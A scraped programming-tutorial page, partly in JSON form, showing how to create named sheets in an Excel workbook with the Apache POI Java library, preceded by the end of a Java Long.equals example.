java.lang.Math; class Gfg1 { // driver code public static void main(String args[]) { // when anything other than argument is passed Long obj1 = new Long(124); System.out.print(\"Object1 & Object2: \"); if (obj1.equals(\"gfg\")) System.out.println(\"Equal\"); else System.out.println(\"Not Equal\"); }}", "e": 3098, "s": 2653, "text": null }, { "code": null, 
"e": 3106, "s": 3098, "text": "Output:" }, { "code": null, "e": 3137, "s": 3106, "text": "Object1 & Object2: Not Equal\n" }, { "code": null, "e": 3152, "s": 3137, "text": "Java-Functions" }, { "code": null, "e": 3170, "s": 3152, "text": "Java-lang package" }, { "code": null, "e": 3180, "s": 3170, "text": "java-Long" }, { "code": null, "e": 3185, "s": 3180, "text": "Java" }, { "code": null, "e": 3190, "s": 3185, "text": "Java" }, { "code": null, "e": 3288, "s": 3190, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 3339, "s": 3288, "text": "Object Oriented Programming (OOPs) Concept in Java" }, { "code": null, "e": 3370, "s": 3339, "text": "How to iterate any Map in Java" }, { "code": null, "e": 3389, "s": 3370, "text": "Interfaces in Java" }, { "code": null, "e": 3419, "s": 3389, "text": "HashMap in Java with Examples" }, { "code": null, "e": 3437, "s": 3419, "text": "ArrayList in Java" }, { "code": null, "e": 3452, "s": 3437, "text": "Stream In Java" }, { "code": null, "e": 3472, "s": 3452, "text": "Collections in Java" }, { "code": null, "e": 3504, "s": 3472, "text": "Multidimensional Arrays in Java" }, { "code": null, "e": 3528, "s": 3504, "text": "Singleton Class in Java" } ]
Creating Sheets in Excel File in Java using Apache POI
11 Jul, 2022

Apache POI is an open-source Java library for creating and manipulating various file formats based on Microsoft Office. Using POI, one can create, modify, and display/read these file formats. Java, for example, has no built-in support for working with Excel files, so an open-source API is needed for the job.

Apache POI provides a Java API for manipulating file formats based on the Office Open XML (OOXML) standard and Microsoft's OLE2 standard. Apache POI releases are available under the Apache License (V2.0).

Implementation:

Before moving ahead, you should be familiar with how to read files with the Apache POI library and with its fundamental interfaces such as Workbook, Sheet, Row, and Cell. To create sheets in a given Excel file, say 'Geeks.xlsx', follow the generic steps listed below.

Step 1: Create a Java Maven project.

Step 2: Add the dependency to the pom.xml file, as shown below.

XML

<!-- https://mvnrepository.com/artifact/org.apache.poi/poi -->
<dependency>
    <groupId>org.apache.poi</groupId>
    <artifactId>poi</artifactId>
    <version>3.12</version>
</dependency>
<dependency>
    <groupId>org.apache.poi</groupId>
    <artifactId>poi-ooxml</artifactId>
    <version>3.12</version>
</dependency>

Step 3: Create a class in the Java source folder (src/main/java).

Java

// Java program to illustrate creating sheets in an Excel file
// using Apache POI

// Importing required classes
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.OutputStream;
import org.apache.poi.ss.usermodel.Sheet;
import org.apache.poi.ss.usermodel.Workbook;
import org.apache.poi.xssf.usermodel.XSSFWorkbook;

// Main class
public class GFG {

    // Main driver method
    public static void main(String[] args)
        throws FileNotFoundException, IOException
    {
        // Creating a Workbook instance. XSSFWorkbook writes the
        // OOXML .xlsx format; HSSFWorkbook would instead produce the
        // older binary .xls format, which would not match the .xlsx
        // file name used below.
        Workbook wb = new XSSFWorkbook();

        // An output stream accepts output bytes and
        // sends them to a sink (here, the file Geeks.xlsx)
        OutputStream fileOut = new FileOutputStream("Geeks.xlsx");

        // Now creating sheets using the Workbook object
        Sheet sheet1 = wb.createSheet("Array");
        Sheet sheet2 = wb.createSheet("String");
        Sheet sheet3 = wb.createSheet("LinkedList");
        Sheet sheet4 = wb.createSheet("Tree");
        Sheet sheet5 = wb.createSheet("Dynamic Programming");
        Sheet sheet6 = wb.createSheet("Puzzles");

        // Display a message on the console for successful
        // execution of the program
        System.out.println("Sheets have been created successfully");

        // Finding the number of sheets present in the workbook
        int numberOfSheets = wb.getNumberOfSheets();
        System.out.println("Total Number of Sheets: " + numberOfSheets);

        // Write the workbook to the file and release the stream
        wb.write(fileOut);
        fileOut.close();
    }
}

Output: On the console

Sheets have been created successfully
Total Number of Sheets: 6

Output: The changes inside the Excel file (the six new sheets in Geeks.xlsx) are depicted in the visual aid provided below.

Output explanation: Six sheets are created in the Excel file used in the above program, that is 'Geeks.xlsx', as shown in the media provided.
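As a quick sanity check, the generated workbook can be reopened and its sheet names listed. The short sketch below is not part of the original article: the class name ListSheets is made up for illustration, and it assumes the Geeks.xlsx file produced by the program above together with the WorkbookFactory helper from the poi-ooxml dependency already declared in the pom.xml.

Java

// A minimal sketch (an assumption, not from the original article)
// that reopens Geeks.xlsx and prints the names of the sheets
// created by the program above.
import java.io.File;
import org.apache.poi.ss.usermodel.Workbook;
import org.apache.poi.ss.usermodel.WorkbookFactory;

public class ListSheets { // hypothetical class name

    public static void main(String[] args) throws Exception {

        // WorkbookFactory inspects the file and returns the matching
        // Workbook implementation (.xls or .xlsx)
        Workbook wb = WorkbookFactory.create(new File("Geeks.xlsx"));

        // Iterate over the sheets and print each sheet name
        for (int i = 0; i < wb.getNumberOfSheets(); i++) {
            System.out.println(wb.getSheetName(i));
        }
    }
}

Run against the file generated above, this should print the six sheet names in the order they were created (Array, String, LinkedList, Tree, Dynamic Programming, Puzzles).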
[ { "code": null, "e": 54, "s": 26, "text": "\n11 Jul, 2022" }, { "code": null, "e": 419, "s": 54, "text": "Apache POI is an open-source java library to create and manipulate various file formats based on Microsoft Office. Using POI, one should be able to perform create, modify and display/read operations on the following file formats. For Example, java doesn’t provide built-in support for working with excel files, so we need to look for open-source APIs for the job. " }, { "code": null, "e": 634, "s": 419, "text": "Apache POI provides Java API for manipulating various file formats based on the Office Open XML (OOXML) standard and OLE2 standard from Microsoft. Apache POI releases are available under the Apache License (V2.0). " }, { "code": null, "e": 650, "s": 634, "text": "Implementation:" }, { "code": null, "e": 992, "s": 650, "text": "Before we move ahead it is suggested geeks you must be well versed with how to read files in the Apache POI library. it does include fundamental interfaces such as Workbook, Sheet, Row, and Cell. For a given Excel file say here it be ‘Geeks.xlsx’, it is needed to create sheets in it then do follow these below generic steps as listed below:" }, { "code": null, "e": 1028, "s": 992, "text": "Step 1: Create a Java Maven project" }, { "code": null, "e": 1112, "s": 1028, "text": "Step 2: Add dependency in the pom.xml file. It is as shown below in the media file." }, { "code": null, "e": 1121, "s": 1112, "text": "Example " }, { "code": null, "e": 1125, "s": 1121, "text": "XML" }, { "code": "<!-- https://mvnrepository.com/artifact/org.apache.poi/poi --><dependency> <groupId>org.apache.poi</groupId> <artifactId>poi</artifactId> <version>3.12</version></dependency><dependency> <groupId>org.apache.poi</groupId> <artifactId>poi-ooxml</artifactId> <version>3.12</version></dependency>", "e": 1436, "s": 1125, "text": null }, { "code": null, "e": 1489, "s": 1436, "text": "Step 3: Create a class in the ‘javaResource’ Folder." 
}, { "code": null, "e": 1494, "s": 1489, "text": "Java" }, { "code": "// Java Program to Illustrate Creating Sheets In Excel File// Using Apache POI // Importing required classesimport java.io.*;import org.apache.poi.hssf.usermodel.HSSFWorkbook;import org.apache.poi.ss.usermodel.Sheet;import org.apache.poi.ss.usermodel.Workbook; // Main class// CreatingSheetpublic class GFG { // Main driver method public static void main(String[] args) throws FileNotFoundException, IOException { // Creating Workbook instances Workbook wb = new HSSFWorkbook(); // An output stream accepts output bytes and // sends them to sink OutputStream fileOut = new FileOutputStream(\"Geeks.xlsx\"); // Now creating Sheets using sheet object Sheet sheet1 = wb.createSheet(\"Array\"); Sheet sheet2 = wb.createSheet(\"String\"); Sheet sheet3 = wb.createSheet(\"LinkedList\"); Sheet sheet4 = wb.createSheet(\"Tree\"); Sheet sheet5 = wb.createSheet(\"Dynamic Programing\"); Sheet sheet6 = wb.createSheet(\"Puzzles\"); // Display message on console for successful // execution of program System.out.println( \"Sheets Has been Created successfully\"); // Finding number of Sheets present in Workbook int numberOfSheets = wb.getNumberOfSheets(); System.out.println(\"Total Number of Sheets: \" + numberOfSheets); wb.write(fileOut); }}", "e": 2925, "s": 1494, "text": null }, { "code": null, "e": 2944, "s": 2925, "text": "Output: On console" }, { "code": null, "e": 3007, "s": 2944, "text": "Sheets Has been Created successfully\nTotal Number of Sheets: 6" }, { "code": null, "e": 3088, "s": 3007, "text": "Output: Changes inside the Excel file are depicted in below visual aid provided." }, { "code": null, "e": 3109, "s": 3088, "text": "Output explanation: " }, { "code": null, "e": 3244, "s": 3109, "text": "Here 6 sheets will be created in the Excel file passed in the above program that is ‘geeks.xlsx‘ as shown in the below media provided." }, { "code": null, "e": 3258, "s": 3244, "text": "solankimayank" }, { "code": null, "e": 3277, "s": 3258, "text": "surindertarika1234" }, { "code": null, "e": 3291, "s": 3277, "text": "nandinigujral" }, { "code": null, "e": 3296, "s": 3291, "text": "Java" }, { "code": null, "e": 3301, "s": 3296, "text": "Java" } ]